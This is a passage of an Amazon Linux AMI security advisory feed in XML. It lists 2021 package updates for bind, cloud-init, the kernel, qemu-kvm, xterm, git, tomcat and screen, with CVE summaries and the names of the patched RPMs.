from="linux-security@amazon.com"><id>ALAS-2021-1485</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1485: important priority package update for bind</title><issued date="2021-03-18 17:22:00" /><updated date="2021-03-19 22:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8625:
A buffer overflow flaw was found in the SPNEGO implementation used by BIND. This flaw allows a remote attacker to cause the named process to crash or possibly perform remote code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1928486: CVE-2020-8625 bind: Buffer overflow in the SPNEGO implementation affecting GSSAPI security policy negotiation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8625" title="" id="CVE-2020-8625" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.86.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.86.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.86.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.86.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.86.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.86.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.86.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.86.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.86.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.86.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.86.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.86.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.86.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.86.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1486</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1486: medium priority package update for cloud-init</title><issued date="2021-03-18 17:22:00" /><updated date="2021-03-19 22:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3429:
99999:
CVE-2020-8632:
A flaw was found in cloud-init, where it uses short passwords when generating a random password in new instances. Depending on the instance configuration, a remote or local attacker may abuse this vulnerability to guess the password of the victim user.
1798728: CVE-2020-8632 cloud-init: Too short random password length in cc_set_password in config/cc_set_passwords.py
CVE-2020-8631:
A flaw was found in cloud-init, where it uses the random.choice function when creating sensitive random strings used for generating a random password in new instances. Depending on the instance configuration, a remote or local attacker may abuse this vulnerability to guess the password of the victim user.
1798731: CVE-2020-8631 cloud-init: Use of random.choice when generating random password
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8631" title="" id="CVE-2020-8631" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8632" title="" id="CVE-2020-8632" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3429" title="" id="CVE-2021-3429" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cloud-init" version="0.7.6" release="43.23.amzn1" epoch="0" arch="noarch"><filename>Packages/cloud-init-0.7.6-43.23.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1487</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1487: important priority package update for kernel</title><issued date="2021-03-18 17:29:00" /><updated date="2021-03-19 23:18:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-28038:
An issue was discovered in the Linux kernel through 5.11.3, as used with Xen PV. A certain part of the netback driver lacks necessary treatment of errors such as failed memory allocations (as a result of changes to the handling of grant mapping errors). A host OS denial of service may occur during misbehavior of a networking frontend driver. NOTE: this issue exists because of an incomplete fix for CVE-2021-26931.
CVE-2021-27365:
A flaw was found in the Linux kernel. A heap buffer overflow in the iSCSI subsystem is triggered by setting an iSCSI string attribute to a value larger than one page and then trying to read it. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1930078: CVE-2021-27365 kernel: heap buffer overflow in the iSCSI subsystem
CVE-2021-27364:
A flaw was found in the Linux kernel. An out-of-bounds read was discovered in the libiscsi module that could lead to reading kernel memory or a crash. The highest threat from this vulnerability is to data confidentiality as well as system availability.
1930080: CVE-2021-27364 kernel: out-of-bounds read in libiscsi module
CVE-2021-27363:
A flaw was found in the way access to sessions and handles was handled in the iSCSI driver in the Linux kernel. A local user could use this flaw to leak iSCSI transport handle kernel address or end arbitrary iSCSI connections on the system.
1930079: CVE-2021-27363 kernel: iscsi: unrestricted access to sessions and handles
CVE-2021-26932:
An issue was discovered in the Linux kernel 3.2 through 5.10.16, as used by Xen. Grant mapping operations often occur in batch hypercalls, where a number of operations are done in a single hypercall, the success or failure of each one is reported to the backend driver, and the backend driver then loops over the results, performing follow-up actions based on the success or failure of each operation. Unfortunately, when running in PV mode, the Linux backend drivers mishandle this: Some errors are ignored, effectively implying their success from the success of related batch elements. In other cases, errors resulting from one batch element lead to further batch elements not being inspected, and hence successful ones to not be possible to properly unmap upon error recovery. Only systems with Linux backends running in PV mode are vulnerable. Linux backends run in HVM / PVH modes are not vulnerable. This affects arch/*/xen/p2m.c and drivers/xen/gntdev.c.
CVE-2021-26931:
An issue was discovered in the Linux kernel 2.6.39 through 5.10.16, as used in Xen. Block, net, and SCSI backends consider certain errors a plain bug, deliberately causing a kernel crash. For errors potentially being at least under the influence of guests (such as out of memory conditions), it isn't correct to assume a plain bug. Memory allocations potentially causing such crashes occur only when Linux is running in PV mode, though. This affects drivers/block/xen-blkback/blkback.c and drivers/xen/xen-scsiback.c.
CVE-2021-26930:
An issue was discovered in the Linux kernel 3.11 through 5.10.16, as used by Xen. To service requests to the PV backend, the driver maps grant references provided by the frontend. In this process, errors may be encountered. In one case, an error encountered earlier might be discarded by later processing, resulting in the caller assuming successful mapping, and hence subsequent operations trying to access space that wasn't mapped. In another case, internal state would be insufficiently updated, preventing safe recovery from the error. This affects drivers/block/xen-blkback/blkback.c.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26930" title="" id="CVE-2021-26930" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26931" title="" id="CVE-2021-26931" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26932" title="" id="CVE-2021-26932" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27363" title="" id="CVE-2021-27363" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27364" title="" id="CVE-2021-27364" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27365" title="" id="CVE-2021-27365" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28038" title="" id="CVE-2021-28038" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.225" release="121.357.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.225-121.357.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.225-121.357.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.225" release="121.357.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.225-121.357.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1488</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1488: medium priority package update for qemu-kvm</title><issued date="2021-03-18 17:30:00" /><updated date="2021-03-19 22:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-16092:
An assertion failure flaw was found in QEMU in the network packet processing component. This issue affects the "e1000e" and "vmxnet3" network devices. This flaw allows a malicious guest user or process to abort the QEMU process on the host, resulting in a denial of service.
1860283: CVE-2020-16092 QEMU: reachable assertion failure in net_tx_pkt_add_raw_fragment() in hw/net/net_tx_pkt.c
CVE-2020-13765:
An out-of-bound write access flaw was found in the way QEMU loads ROM contents at boot time. This flaw occurs in the rom_copy() routine while loading the contents of a 32-bit -kernel image into memory. Running an untrusted -kernel image may load contents at arbitrary memory locations, potentially leading to code execution with the privileges of the QEMU process.
1842912: CVE-2020-13765 QEMU: loader: OOB access while loading registered ROM may lead to code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13765" title="" id="CVE-2020-13765" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16092" title="" id="CVE-2020-16092" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm-tools" version="1.5.3" release="156.26.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.26.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm" version="1.5.3" release="156.26.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.26.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.26.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.26.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="156.26.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.26.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.26.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.26.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1489</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1489: important priority package update for xterm</title><issued date="2021-03-18 17:30:00" /><updated date="2021-03-19 22:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-27135:
A flaw was found in xterm. A specially crafted sequence of combining characters causes an out of bounds write leading to arbitrary code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1927559: CVE-2021-27135 xterm: crash when processing combining characters
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27135" title="" id="CVE-2021-27135" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xterm" version="295" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/xterm-295-3.15.amzn1.x86_64.rpm</filename></package><package name="xterm-debuginfo" version="295" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/xterm-debuginfo-295-3.15.amzn1.x86_64.rpm</filename></package><package name="xterm" version="295" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/xterm-295-3.15.amzn1.i686.rpm</filename></package><package name="xterm-debuginfo" version="295" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/xterm-debuginfo-295-3.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1490</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1490: medium priority package update for git</title><issued date="2021-03-23 22:59:00" /><updated date="2021-03-25 19:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-21300:
Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6.
1935158: CVE-2021-21300 git: remote code execution during clone operation on case-insensitive filesystems
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21300" title="" id="CVE-2021-21300" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Git" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-subtree" version="2.18.5" release="2.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.18.5-2.73.amzn1.x86_64.rpm</filename></package><package name="git" version="2.18.5" release="2.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.18.5-2.73.amzn1.x86_64.rpm</filename></package><package name="git-cvs" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-core" version="2.18.5" release="2.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.18.5-2.73.amzn1.x86_64.rpm</filename></package><package name="git-hg" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.18.5" release="2.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.18.5-2.73.amzn1.x86_64.rpm</filename></package><package name="emacs-git-el" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.18.5" release="2.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.18.5-2.73.amzn1.x86_64.rpm</filename></package><package name="git-svn" version="2.18.5" release="2.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.18.5-2.73.amzn1.x86_64.rpm</filename></package><package name="git-core-doc" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-instaweb" version="2.18.5" release="2.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.18.5-2.73.amzn1.x86_64.rpm</filename></package><package name="git-core" version="2.18.5" release="2.73.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.18.5-2.73.amzn1.i686.rpm</filename></package><package name="git-instaweb" version="2.18.5" release="2.73.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.18.5-2.73.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.18.5" release="2.73.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.18.5-2.73.amzn1.i686.rpm</filename></package><package name="git-subtree" version="2.18.5" release="2.73.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.18.5-2.73.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.18.5" release="2.73.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.18.5-2.73.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.18.5" release="2.73.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.18.5-2.73.amzn1.i686.rpm</filename></package><package name="git" version="2.18.5" release="2.73.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.18.5-2.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1491</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1491: important priority package update for tomcat8</title><issued date="2021-03-23 23:07:00" /><updated date="2021-03-25 19:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-25122:
When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.
1934032: CVE-2021-25122 tomcat: Request mix-up with h2c
CVE-2020-9484:
A deserialization flaw was discovered in Apache Tomcat's use of a FileStore. Under specific circumstances, an attacker can use a specially crafted request to trigger Remote Code Execution through deserialization of the file under their control. The highest threat from the vulnerability is to data confidentiality and integrity as well as system availability.
1838332: CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9484" title="" id="CVE-2020-9484" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25122" title="" id="CVE-2021-25122" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-log4j" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.63-1.87.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1492</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1492: low priority package update for screen</title><issued date="2021-04-07 00:18:00" /><updated date="2021-04-07 18:49:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-26937:
A flaw was found in screen. A specially crafted sequence of combining characters could cause an out of bounds write leading to arbitrary code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1927062: CVE-2021-26937 screen: crash when processing combining chars
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26937" title="" id="CVE-2021-26937" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="screen-debuginfo" version="4.0.3" release="19.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/screen-debuginfo-4.0.3-19.7.amzn1.x86_64.rpm</filename></package><package name="screen" version="4.0.3" release="19.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/screen-4.0.3-19.7.amzn1.x86_64.rpm</filename></package><package name="screen-debuginfo" version="4.0.3" release="19.7.amzn1" epoch="0" arch="i686"><filename>Packages/screen-debuginfo-4.0.3-19.7.amzn1.i686.rpm</filename></package><package name="screen" version="4.0.3" release="19.7.amzn1" epoch="0" arch="i686"><filename>Packages/screen-4.0.3-19.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1493</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1493: low priority package update for tomcat7</title><issued date="2021-04-07 00:18:00" /><updated date="2021-04-07 18:50:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-25329:
The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0. to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue.
1934061: CVE-2021-25329 tomcat: Incomplete fix for CVE-2020-9484 (RCE via session persistence)
CVE-2020-9484:
A deserialization flaw was discovered in Apache Tomcat's use of a FileStore. Under specific circumstances, an attacker can use a specially crafted request to trigger Remote Code Execution through deserialization of the file under their control. The highest threat from the vulnerability is to data confidentiality and integrity as well as system availability.
1838332: CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9484" title="" id="CVE-2020-9484" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25329" title="" id="CVE-2021-25329" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-webapps" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.108" release="1.40.amzn1" epoch="0" 